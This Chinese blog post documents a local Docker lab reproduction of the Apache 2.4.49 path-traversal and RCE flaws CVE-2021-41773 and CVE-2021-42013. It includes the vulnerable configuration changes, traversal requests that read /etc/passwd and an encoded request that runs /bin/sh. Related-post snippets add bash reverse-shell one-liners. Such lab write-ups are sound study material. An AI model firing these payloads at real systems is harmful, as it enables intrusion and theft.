apache-CVE-2021-41773[42013]-本地验证

最新推荐文章于 2024-09-22 13:43:24 发布
最新推荐文章于 2024-09-22 13:43:24 发布
阅读量3.2k 收藏 1
点赞数
分类专栏: 信息安全 文章标签: apache docker linux apache RCE 远程命令执行
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/csd_ct/article/details/122799041
版权

cve-2021-41773本地验证

上次在验证41773时,使用bash命令反弹shell不成功,vulfocus上提供的时在线靶场环境有时间限制,且无法看到后台日志,不知道时哪里出错了,于是决定从0到1开始,在本地搭建一个实验环境,看看是哪里出现了问题

搭建本地验证环境

docker 中直接拉取apache 2.4.49的镜像

docker pull httpd:2.4.49

docker images 查看镜像,如图
在这里插入图片描述
启动该镜像,运行apache,

 docker run -d -p 80:80  --name "apache_2.4.49" -it e91425f38618

在这里插入图片描述
apache docker 启动成功。在浏览器中访问,如图
在这里插入图片描述
docker环境下,默认的配置是不受该漏洞影响的,如图尝试“路径遍历”的POC,发现并没有成功

/cgi-bin/.%2E/%2E%2E/%2E%2E/%2E%2E/etc/passwd
/icons/.%2E/%2E%2E/%2E%2E/%2E%2E/etc/passwd

在这里插入图片描述
在这里插入图片描述
路径穿越导致的任意文件读取漏洞,需要开启配置文件中的 Require all granted
在这里插入图片描述
将配置文件中的第50行,改为"Require all granted",然后重启 apachectl restart,再次使用以上POC访问如图:
在这里插入图片描述

验证远程代码执行CVE-42013

42013 需要在41773的基础上再开启cgi模块后,才能执行成功,如图,先开启CGI模块,去掉配置文件中的84和87行,经验证只需开启84行即可。
在这里插入图片描述

执行以下poc:

http://192.168.65.136/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh

在这里插入图片描述
以上为CVE-2021-41773\42013的apache文件配置及本地验证。漏洞的详细成因可进一步参考【且听安全】以下文章:
CVE-2021-41773-Apache HTTP Server 路径穿越漏洞快速分析与复现 https://mp.weixin.qq.com/s/XEnjVwb9I0GPG9RG-v7lHQ
CVE-2021-41773升华篇-Apache HTTP Server 路径穿越漏洞提升至RCE回显深入分析 https://mp.weixin.qq.com/s/mx7_wTnU7IWxzeG7e6faTQ

下一步 进一步研究 反弹shell失败的原因

csd_ct
关注
专栏目录
【漏洞复现】Struts2 S2-062 (CVE-2021-31805) 远程代码执行漏洞
做自己喜欢的事,并将其发挥到极致!
04-15 3470
文章目录声明前言一、漏洞描述二、漏洞原理三、影响版本四、安全版本五、漏洞细节分析六、本地复现七、漏洞修复 声明 本篇文章仅用于技术研究和漏洞复现,切勿从事非法渗透,造成任何影响与本作者无关,切记! 前言 Apache 官方发布了 Apache Struts2 的风险通告,漏洞编号为 CVE-2021-31805,可能会导致远程代码执行。 一、漏洞描述 此次 Apache Struts2 漏洞为 CVE-2020-17530 ( S2-061 )的修复不完整,导致输入验证不正确。 如果开发人员使用%{…}
log4j2漏洞原理分析及复现-CVE-2021-44228 (vulfocus靶场)
yang1234567898的博客
04-18 3250
搭建靶场: docker pull vulfocus/log4j2-rce-2021-12-09 //拉取靶场镜像 docker run -tid -p 38080:8080 vulfocus/log4j2-rce-2021-12-09 //运行靶场镜像 搭建成功! 利用漏洞 已经漏洞存在的情况下,构造攻击payload执行命令反弹shell bash -i >& /dev/tcp/192.168.96.166/1234 0>&1 由于...
CVE-2021-41773 漏洞复现
Jay17的博客
07-13 821
CVE-2021-41773 漏洞复现
Apache HTTP Server 路径穿越漏洞复现(CVE-2021-41773 )
qq_59975439的博客
06-10 6494
Apache HTTP Server 路径穿越漏洞复现(CVE-2021-41773 )
Apache路径穿越漏洞CVE-2021-41773
最新发布
2401_82451607的博客
09-22 160
Apache路径穿越漏洞CVE-2021-41773
ApacheCVE-2021-41773漏洞
网安小白
08-06 250
该漏洞是由于Apache HTTP Server 2.4.49版本存在⽬录穿越漏洞,在路径穿越⽬录 Require all granted允许被访问的的情况下(默认开启),攻击者可利⽤该路 径穿越漏洞读取到Web⽬录之外的其他⽂件 在服务端开启了gi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执⾏任意cgi命令RCE
Apache CVE-2021-41773漏洞复现
3tefanie丶zhou的博客
10-11 2705
漏洞简介 Apache HTTPd是Apache基金会开源的一款流行的HTTP服务器。2021年10月8日Apache HTTPd官方发布安全更新,披露了CVE-2021-42013 Apache HTTPd 2.4.49/2.4.50 路径穿越漏洞。由于对CVE-2021-41773 Apache HTTPd 2.4.49 路径穿越漏洞的修复不完善,攻击者可构造恶意请求绕过补丁,利用穿越漏洞读取到Web目录之外的其他文件。同时若Apache HTTPd开启了cgi支持,攻击者可构造恶意请求执行命令,控制服
CVE-2021-41773/Apache HTTP Server 路径穿越漏洞
末初的CSDN博客
10-08 4409
自己的一次简单的漏洞复现记录 学习请移步:https://github.com/vulhub/vulhub/blob/master/httpd/CVE-2021-41773/README.zh-cn.md https://httpd.apache.org/security/vulnerabilities_24.html 影响版本:=2.4.49 利用条件:穿越的目录允许被访问,比如配置了<Directory />Require all granted</Directory>。.
Apache Tomcat 信息泄露漏洞CVE-2024-21733、CVE-2024-24549和CVE-2024-34750排查处理
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
08-14 5137
现场的为中小型项目,未直接使用功能tomcat作为容器使用,仅是jar包里spring-boor框架引入tomcat 内嵌到 web项目中作为web server使用,从而保证项目包可直接运行 webapp项目,无需再部署到额外的tomcat服务了;当不想因为Tomcat就改变SpringBoot的版本时,可以采用排除SpringBoot中的Tomcat包,然后手动指定新的Tomcat的版本来实现升级内置组件的目的,当然还要引入Tomcat相关的包。其中,Coyote作为Tomcat的。
Apache mod_proxy SSRF(CVE-2021-40438)的一点分析和延伸
离别歌
10-18 6451
周五晚上开始学习Apache HTTP Server(后文简称为Apache)mod_proxy的SSRF漏洞(CVE-2021-40438),并在星球简单介绍了一下编译、调试Apache...
Apache Tomcat 文件包含漏洞(CNVD-2020-10487,对应 CVE-2020-1938)
03-05
CNVD-2020-10487 和 CVE-2020-1938 是同一个安全漏洞的不同命名,这个漏洞被称为“Apache Tomcat 文件包含漏洞”。此漏洞的存在使得攻击者有可能通过精心构造的请求,将恶意代码注入到Tomcat服务器上,从而执行任意...
【路径穿越】vulfocus/apache-cve_2021_41773
wj33333的博客
11-16 340
利用网上爆出得poc代码尝试获取/etc/passwd中得内容,poc如下,可轻松得到敏感内容。查看/tmp/flag。
【漏洞复现-Apache-目录穿越文件读取-RCE】vulfocus/apache(cve_2021_41773)
10-07 2246
Apache-目录穿越文件读取-RCE
vulfocus apache-cve_2021_41773 漏洞复现
XXokok的博客
11-26 606
vulfocus apache-cve_2021_41773 漏洞复现
vulfocus——apache(cve_2021_41773)
m0_62063669的博客
09-22 1089
攻击者可以通过路径遍历攻击将 URL 映射到预期文档根目录之外的文件,如果文档根目录之外的文件不受“requireall denied”访问控制参数的保护(默认禁用),则这些恶意请求就会成功。除此之外,该漏洞还可能会导致泄漏 CGI 脚本等解释文件的来源。Apache HTTP Server 2.4.49、2.4.50版本对路径规范化所做的更改中存在一个路径穿越漏洞,攻击者可利用该漏洞读取到Web目录外的其他文件,如系统配置文件、网站源码等,甚至在特定情况下,攻击者可构造恶意请求执行命令,控制服务器。
apache-CVE-2021-41773[42013]-反弹shell
csd_ct的专栏
02-06 1857
CVE-2021-41773-反弹shell apache-CVE-2021-41773/42013 中存在RCE,可远程执行代码,本想利用bash反弹一个shell,奈何一直没有成功 ‘’’ bash -i >& /de/tcp/ip/port 0>&1 ‘’’ 经典的bash反弹,确定环境和语句都没问题后,本地查看了靶机的日志,看到有如下报错, 很奇怪,为什么会有一个syntax error:Bad fd number的错误呢,而在本地kali中直接执行该语句,是没有问题的
vulfocus靶场名称: apache-cve_2021_41773/apache-cve_2021_42013
没有故事
04-19 614
Apache HTTP Server 2.4.49、2.4.50版本对路径规范化所做的更改中存在一个路径穿越漏洞,攻击者可利用该漏洞读取到Web目录外的其他文件,如系统配置文件、网站源码等,甚至在特定情况下,攻击者可构造恶意请求执行命令,控制服务器。目录遍历:GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd。1:get:在url后面加上。远程代码执行:bp抓包。
Linux系统的CVE该如何确认?学会这个方法不用慌!
运维少年
06-22 654
在维护过程中,应用系统免不了被客户做定期的漏扫,运维需要根据客户的扫描结果进行反馈是否涉及和是否能整改,本文主要针对Linux CVE漏洞进行一个基本的排查。一、什么是CVE漏洞?CVE 是 Common Vulnerabilities and Exposures 的缩写,意思是“常见漏洞披露”。它是一个由 Microso...
Apache HTTPD 换行解析漏洞(CVE-2017-15715)学习笔记
weixin_44694906的博客
04-01 238
Apache HTTPD 换行解析漏洞(CVE-2017-15715)学习笔记 源代码: <?php if(isset($_FILES['file'])) { //检查变量是否设置 $name = basename($_POST['name']); //basename:返回路径中文件名部分 $ext = pathinfo($name,PATHINFO_EXTENSION); //pathinfo:以数组的性式返回文件路径信息
CVE-2021-4043:最新安全漏洞分析与防护措施
资源摘要信息:"CVE-2021-4043" CVE(Common Vulnerabilities and Exposures)是一个漏洞的标准化命名系统,目的是为了便于识别和共享有关软件漏洞的信息。CVE-2021-4043是指在2021年被发现的一个特定的安全漏洞,它...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值